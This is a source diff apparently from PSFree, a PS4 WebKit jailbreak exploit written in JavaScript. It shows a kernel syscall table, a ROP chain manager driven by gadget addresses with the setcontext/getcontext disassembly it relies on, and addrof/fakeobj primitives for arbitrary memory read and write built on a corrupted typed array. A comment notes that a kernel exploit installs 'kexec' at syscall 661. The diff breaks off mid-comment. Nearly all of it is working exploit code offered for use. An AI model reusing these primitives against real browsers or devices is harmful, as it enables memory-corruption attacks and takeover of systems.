+    'getdirentries' : 196,
+    '__sysctl' : 202,
     'mlock' : 203,
+    'clock_gettime' : 232,
+    'nanosleep' : 240,
+    'sched_yield' : 331,
     'kqueue' : 362,
     'kevent' : 363,
+    'rtprio_thread' : 466,
     'mmap' : 477,
-    // for JIT shared memory
+    'ftruncate' : 480,
+    'shm_open' : 482,
+    'cpuset_getaffinity' : 487,
+    'cpuset_setaffinity' : 488,
     'jitshm_create' : 533,
     'jitshm_alias' : 534,
+    'evf_create' : 538,
+    'evf_delete' : 539,
+    'evf_set' : 544,
+    'evf_clear' : 545,
+    'set_vm_container' : 559,
+    'dmem_container' : 586,
+    'dynlib_dlsym' : 591,
+    'dynlib_get_list' : 592,
+    'dynlib_get_info' : 593,
+    'dynlib_load_prx' : 594,
+    'randomized_path' : 602,
+    'budget_get_ptype' : 610,
+    'thr_suspend_ucontext' : 632,
+    'thr_resume_ucontext' : 633,
+    'blockpool_open' : 653,
+    'blockpool_map' : 654,
+    'blockpool_unmap' : 655,
+    'blockpool_batch' : 657,
+    // syscall 661 is unimplemented so free for use. a kernel exploit will
+    // install "kexec" here
+    'aio_submit' : 661,
+    'kexec' : 661,
+    'aio_multi_delete' : 662,
+    'aio_multi_wait' : 663,
+    'aio_multi_poll' : 664,
+    'aio_multi_cancel' : 666,
+    'aio_submit_cmd' : 669,
+    'blockpool_move' : 673,
 }));
 
-// Extra space to allow a ROP chain to push temporary values. It must pop all
-// of it before reaching a "ret" instruction, else the instruction will pop one
-// of the temporaries as its return address.
-//
-// Also space for additional frames when we call a function since we do not
-// pivot the call to another stack (the called function's stack pointer is
-// pointing to our ROP stack as well).
-const upper_pad = 0x10000;
-// maximum size of the ROP stack
-const stack_size = 0x10000;
-const total_size = upper_pad + stack_size;
-
 const argument_pops = [
     'pop rdi; ret',
     'pop rsi; ret',
@@ -64,49 +100,190 @@ const argument_pops = [
     'pop r9; ret',
 ];
 
+// implementations are expected to have these gadgets:
+// * libSceLibcInternal:
+//   * __errno - FreeBSD's function to get the location of errno
+//   * setcontext - what we call Sony's own version of _Ux86_64_setcontext
+//   * getcontext - what we call Sony's own version of _Ux86_64_getcontext
+// * anywhere:
+//   * the gadgets at argument_pops
+//   * ret
+//
+// setcontext/getcontext naming came from this project:
+// https://github.com/libunwind/libunwind
+//
+// setcontext(context *ctx):
+//     mov     rax, qword [rdi + 0x38]
+//     sub     rax, 0x10 ; 16
+//     mov     qword [rdi + 0x38], rax
+//     mov     rbx, qword [rdi + 0x20]
+//     mov     qword [rax], rbx
+//     mov     rbx, qword [rdi + 0x80]
+//     mov     qword [rax + 8], rbx
+//     mov     rax, qword [rdi]
+//     mov     rbx, qword [rdi + 8]
+//     mov     rcx, qword [rdi + 0x10]
+//     mov     rdx, qword [rdi + 0x18]
+//     mov     rsi, qword [rdi + 0x28]
+//     mov     rbp, qword [rdi + 0x30]
+//     mov     r8, qword [rdi + 0x40]
+//     mov     r9, qword [rdi + 0x48]
+//     mov     r10, qword [rdi + 0x50]
+//     mov     r11, qword [rdi + 0x58]
+//     mov     r12, qword [rdi + 0x60]
+//     mov     r13, qword [rdi + 0x68]
+//     mov     r14, qword [rdi + 0x70]
+//     mov     r15, qword [rdi + 0x78]
+//     cmp     qword [rdi + 0xb0], 0x20001
+//     jne     done
+//     cmp     qword [rdi + 0xb8], 0x10002
+//     jne     done
+//     fxrstor [rdi + 0xc0]
+// done:
+//     mov     rsp, qword [rdi + 0x38]
+//     pop     rdi
+//     ret
+//
+//  getcontext(context *ctx):
+//     mov     qword [rdi], rax
+//     mov     qword [rdi + 8], rbx
+//     mov     qword [rdi + 0x10], rcx
+//     mov     qword [rdi + 0x18], rdx
+//     mov     qword [rdi + 0x20], rdi
+//     mov     qword [rdi + 0x28], rsi
+//     mov     qword [rdi + 0x30], rbp
+//     mov     qword [rdi + 0x38], rsp
+//     add     qword [rdi + 0x38], 8
+//     mov     qword [rdi + 0x40], r8
+//     mov     qword [rdi + 0x48], r9
+//     mov     qword [rdi + 0x50], r10
+//     mov     qword [rdi + 0x58], r11
+//     mov     qword [rdi + 0x60], r12
+//     mov     qword [rdi + 0x68], r13
+//     mov     qword [rdi + 0x70], r14
+//     mov     qword [rdi + 0x78], r15
+//     mov     rsi, qword [rsp]
+//     mov     qword [rdi + 0x80], rsi
+//     fxsave  [rdi + 0xc0]
+//     mov     qword [rdi + 0xb0], 0x20001
+//     mov     qword [rdi + 0xb8], 0x10002
+//     xor     eax, eax
+//     ret
+
+// ROP chain manager base class
+//
+// Args:
+//   stack_size: the size of the stack
+//   upper_pad: the amount of extra space above stack
 export class ChainBase {
-    constructor() {
-        this.is_stale = false;
+    constructor(stack_size=0x1000, upper_pad=0x10000) {
+        this._is_dirty = false;
         this.position = 0;
-        this._return_value = new Uint8Array(8);
-        this.retval_addr = get_view_vector(this._return_value);
 
-        const stack_buffer = new ArrayBuffer(total_size);
-        this.stack_buffer = stack_buffer;
-        this.stack = new Uint8Array(stack_buffer, upper_pad, stack_size);
-        this.stack_addr = get_view_vector(this.stack);
+        const return_value = new Uint32Array(4);
+        this._return_value = return_value;
+        this.retval_addr = get_view_vector(return_value);
+
+        const errno = new Uint32Array(1);
+        this._errno = errno;
+        this.errno_addr = get_view_vector(errno);
+
+        const full_stack_size = upper_pad + stack_size;
+        const stack_buffer = new ArrayBuffer(full_stack_size);
+        const stack = new DataView(stack_buffer, upper_pad);
+        this.stack = stack;
+        this.stack_addr = get_view_vector(stack);
+        this.stack_size = stack_size;
+        this.full_stack_size = full_stack_size;
     }
 
-    check_stale() {
-        if (this.is_stale) {
-            throw Error('chain already ran, clean it first');
-        }
-        this.is_stale = true;
+    // use this if you want to write a new ROP chain but don't want to allocate
+    // a new instance
+    empty() {
+        this.position = 0;
     }
 
-    check_is_empty() {
-        if (this.position === 0) {
-            throw Error('chain is empty');
-        }
+    // flag indicating whether .run() was ever called with this chain
+    get is_dirty() {
+        return this._is_dirty;
     }
 
     clean() {
-        this.position = 0;
-        this.is_stale = false;
+        this._is_dirty = false;
+    }
+
+    dirty() {
+        this._is_dirty = true;
+    }
+
+    check_allow_run() {
+        if (this.position === 0) {
+            throw Error('chain is empty');
+        }
+        if (this.is_dirty) {
+            throw Error('chain already ran, clean it first');
+        }
+    }
+
+    reset() {
+        this.empty();
+        this.clean();
+    }
+
+    get retval_int() {
+        return this._return_value[0] | 0;
+    }
+
+    get retval() {
+        return new Int(this._return_value[0], this._return_value[1]);
+    }
+
+    // return value as a pointer
+    get retval_ptr() {
+        return new Addr(this._return_value[0], this._return_value[1]);
+    }
+
+    set retval(value) {
+        const values = lohi_from_one(value);
+        const retval = this._return_value;
+        retval[0] = values[0];
+        retval[1] = values[1];
+    }
+
+    get retval_all() {
+        const retval = this._return_value;
+        return [new Int(retval[0], retval[1]), new Int(retval[2], retval[3])];
+    }
+
+    set retval_all(values) {
+        const [a, b] = [lohi_from_one(values[0]), lohi_from_one(values[1])];
+        const retval = this._return_value;
+        retval[0] = a[0];
+        retval[1] = a[1];
+        retval[2] = b[0];
+        retval[3] = b[1];
+    }
+
+    get errno() {
+        return this._errno[0];
+    }
+
+    set errno(value) {
+        this._errno[0] = value;
     }
 
-    // this will raise an error if the value is not an Int
     push_value(value) {
-        if (this.position >= stack_size) {
+        const position = this.position;
+        if (position >= this.stack_size) {
             throw Error(`no more space on the stack, pushed value: ${value}`);
         }
-        write64(this.stack, this.position, value);
-        this.position += 8;
-    }
 
-    // converts value to Int first
-    push_constant(value) {
-        this.push_value(new Int(value));
+        const values = lohi_from_one(value);
+        const stack = this.stack;
+        stack.setUint32(position, values[0], true);
+        stack.setUint32(position + 4, values[1], true);
+
+        this.position += 8;
     }
 
     get_gadget(insn_str) {
@@ -125,14 +302,13 @@ export class ChainBase {
     push_call(func_addr, ...args) {
         if (args.length > 6) {
             throw TypeError(
-                'call() does not support functions that have more than 6'
-                + ' arguments'
-            );
+                'push_call() does not support functions that have more than 6'
+                + ' arguments');
         }
 
         for (let i = 0; i < args.length; i++) {
             this.push_gadget(argument_pops[i]);
-            this.push_constant(args[i]);
+            this.push_value(args[i]);
         }
 
         // The address of our buffer seems to be always aligned to 8 bytes.
@@ -143,7 +319,11 @@ export class ChainBase {
             this.push_gadget('ret');
         }
 
-        this.push_value(func_addr);
+        if (typeof func_addr === 'string') {
+            this.push_gadget(func_addr);
+        } else {
+            this.push_value(func_addr);
+        }
     }
 
     push_syscall(syscall_name, ...args) {
@@ -164,43 +344,239 @@ export class ChainBase {
         this.push_call(syscall_addr, ...args);
     }
 
-    // ROP chain to retrieve rax
-    push_get_retval() {
-        throw Error('push_get_retval() not implemented');
-    }
-
-    // Firmware specific method to launch a ROP chain
-    //
-    // Implementations must call check_stale() and check_is_empty() before
-    // trying to launch the chain.
-    run() {
-        throw Error('run() not implemented');
-    }
-
-    get return_value() {
-        return read64(this._return_value, 0);
-    }
-
     // Sets needed class properties
     //
     // Args:
     //   gadgets:
-    //     A Map-like object mapping instruction strings (e.g "pop rax; ret")
+    //     A Map-like object mapping instruction strings (e.g. "pop rax; ret")
     //     to their addresses in memory.
     //   syscall_array:
     //     An array whose indices correspond to syscall numbers. Maps syscall
     //     numbers to their addresses in memory. Defaults to an empty Array.
-    //
-    // Raises:
-    //   Error:
-    //     For missing bare minimum gadgets
     static init_class(gadgets, syscall_array=[]) {
-        for (const insn of argument_pops) {
-            if (!gadgets.has(insn)) {
-                throw Error(`gadget map must contain this gadget: ${insn}`);
-            }
-        }
         this.prototype.gadgets = gadgets;
         this.prototype.syscall_array = syscall_array;
     }
+
+    // START: implementation-dependent parts
+    //
+    // the user doesn't need to implement all of these. just the ones they need
+
+    // Firmware specific method to launch a ROP chain
+    //
+    // Proper implementations will check if .position is nonzero before
+    // running. Implementations can optionally check .is_dirty to enforce
+    // single-run gadget sequences
+    run() {
+        throw Error('not implemented');
+    }
+
+    // anything you need to do before the ROP chain jumps back to JavaScript
+    push_end() {
+        throw Error('not implemented');
+    }
+
+    push_get_errno() {
+        throw Error('not implemented');
+    }
+
+    push_clear_errno() {
+        throw Error('not implemented'); 
+    }
+
+    // get the rax register
+    push_get_retval() {
+        throw Error('not implemented');
+    }
+
+    // get the rax and rdx registers
+    push_get_retval_all() {
+        throw Error('not implemented');
+    }
+
+    // END: implementation-dependent parts
+
+    // note that later firmwares (starting around > 5.00?), the browser doesn't
+    // have a JIT compiler. we programmed in a way that tries to make the
+    // resulting bytecode be optimal
+    //
+    // we intentionally have an incomplete set (there's no function to get a
+    // full 128-bit result). we only implemented what we think are the common
+    // cases. the user will have to implement those other functions if they
+    // need it
+
+    do_call(...args) {
+        if (this.position) {
+            throw Error('chain not empty');
+        }
+        try {
+            this.push_call(...args);
+            this.push_get_retval();
+            this.push_get_errno();
+            this.push_end();
+            this.run();
+        } finally {
+            this.reset();
+        }
+    }
+
+    call_void(...args) {
+        this.do_call(...args);
+    }
+
+    call_int(...args) {
+        this.do_call(...args);
+        // x | 0 will always be a signed integer
+        return this._return_value[0] | 0;
+    }
+
+    call(...args) {
+        this.do_call(...args);
+        const retval = this._return_value;
+        return new Int(retval[0], retval[1]);
+    }
+
+    do_syscall(...args) {
+        if (this.position) {
+            throw Error('chain not empty');
+        }
+        try {
+            this.push_syscall(...args);
+            this.push_get_retval();
+            this.push_get_errno();
+            this.push_end();
+            this.run();
+        } finally {
+            this.reset();
+        }
+    }
+
+    syscall_void(...args) {
+        this.do_syscall(...args);
+    }
+
+    syscall_int(...args) {
+        this.do_syscall(...args);
+        // x | 0 will always be a signed integer
+        return this._return_value[0] | 0;
+    }
+
+    syscall(...args) {
+        this.do_syscall(...args);
+        const retval = this._return_value;
+        return new Int(retval[0], retval[1]);
+    }
+
+    syscall_ptr(...args) {
+        this.do_syscall(...args);
+        const retval = this._return_value;
+        return new Addr(retval[0], retval[1]);
+    }
+
+    // syscall variants that throw an error on errno
+
+    do_syscall_clear_errno(...args) {
+        if (this.position) {
+            throw Error('chain not empty');
+        }
+        try {
+            this.push_clear_errno();
+            this.push_syscall(...args);
+            this.push_get_retval();
+            this.push_get_errno();
+            this.push_end();
+            this.run();
+        } finally {
+            this.reset();
+        }
+    }
+
+    sysi(...args) {
+        const errno = this._errno;
+        this.do_syscall_clear_errno(...args);
+
+        const err = errno[0];
+        if (err !== 0) {
+            throw Error(`syscall(${args[0]}) errno: ${err}`);
+        }
+
+        // x | 0 will always be a signed integer
+        return this._return_value[0] | 0;
+    }
+
+    sys(...args) {
+        const errno = this._errno;
+        this.do_syscall_clear_errno(...args);
+
+        const err = errno[0];
+        if (err !== 0) {
+            throw Error(`syscall(${args[0]}) errno: ${err}`);
+        }
+
+        const retval = this._return_value;
+        return new Int(retval[0], retval[1]);
+    }
+
+    sysp(...args) {
+        const errno = this._errno;
+        this.do_syscall_clear_errno(...args);
+
+        const err = errno[0];
+        if (err !== 0) {
+            throw Error(`syscall(${args[0]}) errno: ${err}`);
+        }
+
+        const retval = this._return_value;
+        return new Addr(retval[0], retval[1]);
+    }
+
+}
+
+export function get_gadget(map, insn_str) {
+    const addr = map.get(insn_str);
+    if (addr === undefined) {
+        throw Error(`gadget not found: ${insn_str}`);
+    }
+
+    return addr;
+}
+
+function load_fw_specific(version) {
+    if (version & 0x10000) {
+        throw RangeError('ps5 not supported yet');
+    }
+
+    const value = version & 0xffff;
+    // we don't want to bother with very old firmwares that don't support
+    // ECMAScript 2015. 6.xx WebKit poisons the pointer fields of some types
+    // which can be annoying to deal with
+    if (value < 0x700) {
+        throw RangeError("PS4 firmwares < 7.00 isn't supported");
+    }
+
+    if (0x800 <= value && value <= 0x900) {
+        return import('/rop/900.mjs');
+    }
+
+    throw RangeError('firmware not supported');
+}
+
+export let gadgets = null;
+export let libwebkit_base = null;
+export let libkernel_base = null;
+export let libc_base = null;
+export let init_gadget_map = null;
+export let Chain = null;
+
+export async function init() {
+    const module = await load_fw_specific(config.target);
+    Chain = module.Chain;
+    module.init(Chain);
+    ({
+        gadgets,
+        libwebkit_base,
+        libkernel_base,
+        libc_base,
+        init_gadget_map,
+    } = module);
 }
diff --git a/module/int64.mjs b/module/int64.mjs
index 5e9864e..248872e 100644
--- a/module/int64.mjs
+++ b/module/int64.mjs
@@ -1,4 +1,4 @@
-/* Copyright (C) 2023 anonymous
+/* Copyright (C) 2023-2025 anonymous
 
 This file is part of PSFree.
 
@@ -15,184 +15,119 @@ GNU Affero General Public License for more details.
 You should have received a copy of the GNU Affero General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 
-function check_range(x) {
-    return (-0x80000000 <= x) && (x <= 0xffffffff);
+// cache some constants
+const isInteger = Number.isInteger;
+
+function check_not_in_range(x) {
+    return !(isInteger(x) && -0x80000000 <= x && x <= 0xffffffff);
 }
 
-function unhexlify(hexstr) {
-    if (hexstr.substring(0, 2) === "0x") {
-        hexstr = hexstr.substring(2);
-    }
-    if (hexstr.length % 2 === 1) {
-        hexstr = '0' + hexstr;
-    }
-    if (hexstr.length % 2 === 1) {
-        throw TypeError("Invalid hex string");
+// use this if you want to support objects convertible to Int but only need
+// their low/high bits. creating a Int is slower compared to just using this
+// function
+export function lohi_from_one(low) {
+    if (low instanceof Int) {
+        return low._u32.slice();
     }
 
-    let bytes = new Uint8Array(hexstr.length / 2);
-    for (let i = 0; i < hexstr.length; i += 2) {
-        let new_i = hexstr.length - 2 - i;
-        let substr = hexstr.slice(new_i, new_i + 2);
-        bytes[i / 2] = parseInt(substr, 16);
+    if (check_not_in_range(low)) {
+        throw TypeError(`low not a 32-bit integer: ${low}`);
     }
 
-    return bytes;
-}
-
-// Decorator for Int instance operations. Takes care
-// of converting arguments to Int instances if required.
-function operation(f, nargs) {
-    return function () {
-        if (arguments.length !== nargs)
-            throw Error("Not enough arguments for function " + f.name);
-        let new_args = [];
-        for (let i = 0; i < arguments.length; i++) {
-            if (!(arguments[i] instanceof Int)) {
-                new_args[i] = new Int(arguments[i]);
-            } else {
-                new_args[i] = arguments[i];
-            }
-        }
-        return f.apply(this, new_args);
-    };
+    return [low >>> 0, low < 0 ? -1 >>> 0 : 0];
 }
 
+// immutable 64-bit integer
 export class Int {
     constructor(low, high) {
-        let buffer = new Uint32Array(2);
-        let bytes = new Uint8Array(buffer.buffer);
-
-        if (arguments.length > 2) {
-            throw TypeError('Int takes at most 2 args');
-        }
-        if (arguments.length === 0) {
-            throw TypeError('Int takes at min 1 args');
-        }
-        let is_one = false;
-        if (arguments.length === 1) {
-            is_one = true;
+        if (high === undefined) {
+            this._u32 = new Uint32Array(lohi_from_one(low));
+            return;
         }
 
-        if (!is_one) {
-            if (typeof (low) !== 'number'
-                && typeof (high) !== 'number') {
-                throw TypeError('low/high must be numbers');
-            }
+        if (check_not_in_range(low)) {
+            throw TypeError(`low not a 32-bit integer: ${low}`);
         }
 
-        if (typeof low === 'number') {
-            if (!check_range(low)) {
-                throw TypeError('low not a valid value: ' + low);
-            }
-            if (is_one) {
-                high = 0;
-                if (low < 0) {
-                    high = -1;
-                }
-            } else {
-                if (!check_range(high)) {
-                    throw TypeError('high not a valid value: ' + high);
-                }
-            }
-            buffer[0] = low;
-            buffer[1] = high;
-        } else if (typeof low === 'string') {
-            bytes.set(unhexlify(low));
-        } else if (typeof low === 'object') {
-            if (low instanceof Int) {
-                bytes.set(low.bytes);
-            } else {
-                if (low.length !== 8)
-                    throw TypeError("Array must have exactly 8 elements.");
-                bytes.set(low);
-            }
-        } else {
-            throw TypeError('Int does not support your object for conversion');
+        if (check_not_in_range(high)) {
+            throw TypeError(`high not a 32-bit integer: ${high}`);
         }
 
-        this.buffer = buffer;
-        this.bytes = bytes;
-
-        this.eq = operation(function eq(b) {
-            const a = this;
-            return a.low() === b.low() && a.high() === b.high();
-        }, 1);
-
-        this.neg = operation(function neg() {
-            let type = this.constructor;
-
-            let low = ~this.low();
-            let high = ~this.high();
-
-            let res = (new Int(low, high)).add(1);
-
-            return new type(res);
-        }, 0);
-
-        this.add = operation(function add(b) {
-            let type = this.constructor;
-
-            let low = this.low();
-            let high = this.high();
-
-            low += b.low();
-            let carry = 0;
-            if (low > 0xffffffff) {
-                carry = 1;
-            }
-            high += carry + b.high();
-
-            low &= 0xffffffff;
-            high &= 0xffffffff;
-
-            return new type(low, high);
-        }, 1);
-
-        this.sub = operation(function sub(b) {
-            let type = this.constructor;
-
-            b = b.neg();
-
-            let low = this.low();
-            let high = this.high();
-
-            low += b.low();
-            let carry = 0;
-            if (low > 0xffffffff) {
-                carry = 1;
-            }
-            high += carry + b.high();
-
-            low &= 0xffffffff;
-            high &= 0xffffffff;
-
-            return new type(low, high);
-        }, 1);
+        this._u32 = new Uint32Array([low, high]);
     }
 
-    low() {
-        return this.buffer[0];
+    get lo() {
+        return this._u32[0];
     }
 
-    high() {
-        return this.buffer[1];
+    get hi() {
+        return this._u32[1];
     }
 
-    toString(is_pretty) {
+    // return low/high as signed integers
+
+    get bot() {
+        return this._u32[0] | 0;
+    }
+
+    get top() {
+        return this._u32[1] | 0;
+    }
+
+    neg() {
+        const u32 = this._u32;
+        const low = (~u32[0] >>> 0) + 1;
+        return new this.constructor(
+            low >>> 0,
+            ((~u32[1] >>> 0) + (low > 0xffffffff)) >>> 0,
+        );
+    }
+
+    eq(b) {
+        const values = lohi_from_one(b);
+        const u32 = this._u32;
+        return (
+            u32[0] === values[0]
+            && u32[1] === values[1]
+        );
+    }
+
+    ne(b) {
+        return !this.eq(b);
+    }
+
+    add(b) {
+        const values = lohi_from_one(b);
+        const u32 = this._u32;
+        const low = u32[0] + values[0];
+        return new this.constructor(
+            low >>> 0,
+            (u32[1] + values[1] + (low > 0xffffffff)) >>> 0,
+        );
+    }
+
+    sub(b) {
+        const values = lohi_from_one(b);
+        const u32 = this._u32;
+        const low = u32[0] + (~values[0] >>> 0) + 1;
+        return new this.constructor(
+            low >>> 0,
+            (u32[1] + (~values[1] >>> 0) + (low > 0xffffffff)) >>> 0,
+        );
+    }
+
+    toString(is_pretty=false) {
         if (!is_pretty) {
-            let low = this.low().toString(16).padStart(8, '0');
-            let high = this.high().toString(16).padStart(8, '0');
+            const low = this.lo.toString(16).padStart(8, '0');
+            const high = this.hi.toString(16).padStart(8, '0');
             return '0x' + high + low;
         }
-        let high = this.high().toString(16).padStart(8, '0');
+        let high = this.hi.toString(16).padStart(8, '0');
         high = high.substring(0, 4) + '_' + high.substring(4);
 
-        let low = this.low().toString(16).padStart(8, '0');
+        let low = this.lo.toString(16).padStart(8, '0');
         low = low.substring(0, 4) + '_' + low.substring(4);
+
         return '0x' + high + '_' + low;
     }
 }
-
-Int.Zero = new Int(0);
-Int.One = new Int(1);
diff --git a/module/mem.mjs b/module/mem.mjs
index 9532a02..2620230 100644
--- a/module/mem.mjs
+++ b/module/mem.mjs
@@ -1,4 +1,4 @@
-/* Copyright (C) 2023-2024 anonymous
+/* Copyright (C) 2023-2025 anonymous
 
 This file is part of PSFree.
 
@@ -15,214 +15,416 @@ GNU Affero General Public License for more details.
 You should have received a copy of the GNU Affero General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 
-import { Int } from './int64.mjs';
-import {
-    read16,
-    read32,
-    read64,
-    write16,
-    write32,
-    write64,
-} from './rw.mjs';
-import * as o from './offset.mjs';
+import { Int, lohi_from_one } from './int64.mjs';
+import { view_m_vector, view_m_length } from './offset.mjs';
 
 export let mem = null;
 
+// cache some constants
+const off_vector = view_m_vector / 4;
+const off_vector2 = (view_m_vector + 4) / 4;
+const isInteger = Number.isInteger;
+
 function init_module(memory) {
     mem = memory;
 }
 
+function add_and_set_addr(mem, offset, base_lo, base_hi) {
+    const values = lohi_from_one(offset);
+    const main = mem._main;
+
+    const low = base_lo + values[0];
+
+    // no need to use ">>> 0" to convert to unsigned here
+    main[off_vector] = low;
+    main[off_vector2] = base_hi + values[1] + (low > 0xffffffff);
+}
+
 export class Addr extends Int {
     read8(offset) {
-        const addr = this.add(offset);
-        return mem.read8(addr);
+        const m = mem;
+        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+            m._set_addr_direct(this);
+        } else {
+            add_and_set_addr(m, offset, this.lo, this.hi);
+            offset = 0;
+        }
+
+        return m.read8_at(offset);
     }
 
     read16(offset) {
-        const addr = this.add(offset);
-        return mem.read16(addr);
+        const m = mem;
+        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+            m._set_addr_direct(this);
+        } else {
+            add_and_set_addr(m, offset, this.lo, this.hi);
+            offset = 0;
+        }
+
+        return m.read16_at(offset);
     }
 
     read32(offset) {
-        const addr = this.add(offset);
-        return mem.read32(addr);
+        const m = mem;
+        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+            m._set_addr_direct(this);
+        } else {
+            add_and_set_addr(m, offset, this.lo, this.hi);
+            offset = 0;
+        }
+
+        return m.read32_at(offset);
     }
 
     read64(offset) {
-        const addr = this.add(offset);
-        return mem.read64(addr);
+        const m = mem;
+        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+            m._set_addr_direct(this);
+        } else {
+            add_and_set_addr(m, offset, this.lo, this.hi);
+            offset = 0;
+        }
+
+        return m.read64_at(offset);
     }
 
-    // returns a pointer instead of an Int
     readp(offset) {
-        const addr = this.add(offset);
-        return mem.readp(addr);
+        const m = mem;
+        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+            m._set_addr_direct(this);
+        } else {
+            add_and_set_addr(m, offset, this.lo, this.hi);
+            offset = 0;
+        }
+
+        return m.readp_at(offset);
     }
 
     write8(offset, value) {
-        const addr = this.add(offset);
+        const m = mem;
+        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+            m._set_addr_direct(this);
+        } else {
+            add_and_set_addr(m, offset, this.lo, this.hi);
+            offset = 0;
+        }
 
-        mem.write8(addr, value);
+        m.write8_at(offset, value);
     }
 
     write16(offset, value) {
-        const addr = this.add(offset);
+        const m = mem;
+        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+            m._set_addr_direct(this);
+        } else {
+            add_and_set_addr(m, offset, this.lo, this.hi);
+            offset = 0;
+        }
 
-        mem.write16(addr, value);
+        m.write16_at(offset, value);
     }
 
     write32(offset, value) {
-        const addr = this.add(offset);
+        const m = mem;
+        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+            m._set_addr_direct(this);
+        } else {
+            add_and_set_addr(m, offset, this.lo, this.hi);
+            offset = 0;
+        }
 
-        mem.write32(addr, value);
+        m.write32_at(offset, value);
     }
 
     write64(offset, value) {
-        const addr = this.add(offset);
+        const m = mem;
+        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+            m._set_addr_direct(this);
+        } else {
+            add_and_set_addr(m, offset, this.lo, this.hi);
+            offset = 0;
+        }
 
-        mem.write64(addr, value);
+        m.write64_at(offset, value);
     }
 }
 
-class MemoryBase {
-    _addrof(obj) {
-        if (typeof obj !== 'object'
-            && typeof obj !== 'function'
-        ) {
-            throw TypeError('addrof argument not a JS object');
+// expected:
+// * main - Uint32Array whose m_vector points to worker
+// * worker - DataView
+//
+// addrof()/fakeobj() expectations:
+// * obj - has a "addr" property and a 0 index.
+// * addr_addr - Int, the address of the slot of obj.addr
+// * fake_addr - Int, the address of the slot of obj[0]
+//
+// a valid example for "obj" is "{addr: null, 0: 0}". note that this example
+// has [0] be 0 so that the butterfly's indexing type is ArrayWithInt32. this
+// prevents the garbage collector from incorrectly treating the slot's value as
+// a JSObject and then crash
+//
+// the relative read/write methods expect the offset to be a unsigned 32-bit
+// integer
+export class Memory {
+    constructor(main, worker, obj, addr_addr, fake_addr)  {
+        this._main = main;
+        this._worker = worker;
+        this._obj = obj;
+        this._addr_low = addr_addr.lo;
+        this._addr_high = addr_addr.hi;
+        this._fake_low = fake_addr.lo;
+        this._fake_high = fake_addr.hi;
+
+        main[view_m_length / 4] = 0xffffffff;
+
+        init_module(this);
+
+        const off_mvec = view_m_vector;
+        // use this to create WastefulTypedArrays to avoid a GC crash
+        const buf = new ArrayBuffer(0);
+
+        const src = new Uint8Array(buf);
+        const sset = new Uint32Array(buf);
+        const sset_p = this.addrof(sset);
+        sset_p.write64(off_mvec, this.addrof(src).add(off_mvec));
+        sset_p.write32(view_m_length, 3);
+        this._cpysrc = src;
+        this._src_setter = sset;
+
+        const dst = new Uint8Array(buf);
+        const dset = new Uint32Array(buf);
+        const dset_p = this.addrof(dset);
+        dset_p.write64(off_mvec, this.addrof(dst).add(off_mvec));
+        dset_p.write32(view_m_length, 3);
+        dset[2] = 0xffffffff;
+        this._cpydst = dst;
+        this._dst_setter = dset;
+    }
+
+    // dst and src may overlap
+    cpy(dst, src, len) {
+        if (!(isInteger(len) && 0 <= len && len <= 0xffffffff)) {
+            throw TypeError('len not a unsigned 32-bit integer');
         }
-        this.worker.a = obj;
-        write64(this.main, o.view_m_vector, this.butterfly.sub(0x10));
-        let res = read64(this.worker, 0);
-        write64(this.main, o.view_m_vector, this._current_addr);
+
+        const dvals = lohi_from_one(dst);
+        const svals = lohi_from_one(src);
+        const dset = this._dst_setter;
+        const sset = this._src_setter;
+
+        dset[0] = dvals[0];
+        dset[1] = dvals[1];
+        sset[0] = svals[0];
+        sset[1] = svals[1];
+        sset[2] = len;
+
+        this._cpydst.set(this._cpysrc);
+    }
+
+    // allocate Garbage Collector managed memory. returns [address_of_memory,
+    // backer]. backer is the JSCell that is keeping the returned memory alive,
+    // you can drop it once you have another GC object reference the address.
+    // the backer is an implementation detail. don't use it to mutate the
+    // memory
+    gc_alloc(size) {
+        if (!isInteger(size)) {
+            throw TypeError('size not a integer');
+        }
+        if (size < 0) {
+            throw RangeError('size is negative');
+        }
+
+        const fastLimit = 1000;
+        size = (size + 7 & ~7) >> 3;
+        if (size > fastLimit) {
+            throw RangeError('size is too large');
+        }
+
+        const backer = new Float64Array(size);
+        return [mem.addrof(backer).readp(view_m_vector), backer];
+    }
+
+    fakeobj(addr) {
+        const values = lohi_from_one(addr);
+        const worker = this._worker;
+        const main = this._main;
+
+        main[off_vector] = this._fake_low;
+        main[off_vector2] = this._fake_high;
+        worker.setUint32(0, values[0], true);
+        worker.setUint32(4, values[1], true);
+        return this._obj[0];
+    }
+
+    addrof(object) {
+        // typeof considers null as a object. blacklist it as it isn't a
+        // JSObject
+        if (object === null
+            || (typeof object !== 'object' && typeof object !== 'function')
+        ) {
+            throw TypeError('argument not a JS object');
+        }
+
+        const obj = this._obj;
+        const worker = this._worker;
+        const main = this._main;
+
+        obj.addr = object;
+
+        main[off_vector] = this._addr_low;
+        main[off_vector2] = this._addr_high;
+
+        const res = new Addr(
+            worker.getUint32(0, true),
+            worker.getUint32(4, true),
+        );
+        obj.addr = null;
 
         return res;
     }
 
-    addrof(obj) {
-        return new Addr(this._addrof(obj));
+    // expects addr to be a Int
+    _set_addr_direct(addr) {
+        const main = this._main;
+        main[off_vector] = addr.lo;
+        main[off_vector2] = addr.hi;
     }
 
     set_addr(addr) {
-        if (!(addr instanceof Int)) {
-            throw TypeError('addr must be an Int');
-        }
-        this._current_addr = addr;
-        write64(this.main, o.view_m_vector, this._current_addr);
+        const values = lohi_from_one(addr);
+        const main = this._main;
+        main[off_vector] = values[0];
+        main[off_vector2] = values[1];
     }
 
     get_addr() {
-        return this._current_addr;
-    }
-
-    // write0() is for when you want to write to address 0. You can't use for
-    // example: "mem.write32(Int.Zero, 0)", since you can't set by index the
-    // view when it isDetached(). isDetached() == true when m_mode >=
-    // WastefulTypedArray and m_vector == 0.
-    //
-    // Functions like write32() will index mem.worker via write() from rw.mjs.
-    //
-    // size is the number of bits to read/write.
-    //
-    // The constraint is 0 <= offset + 1 < 2**32.
-    //
-    // PS4 firmwares >= 9.00 and any PS5 version can write to address 0
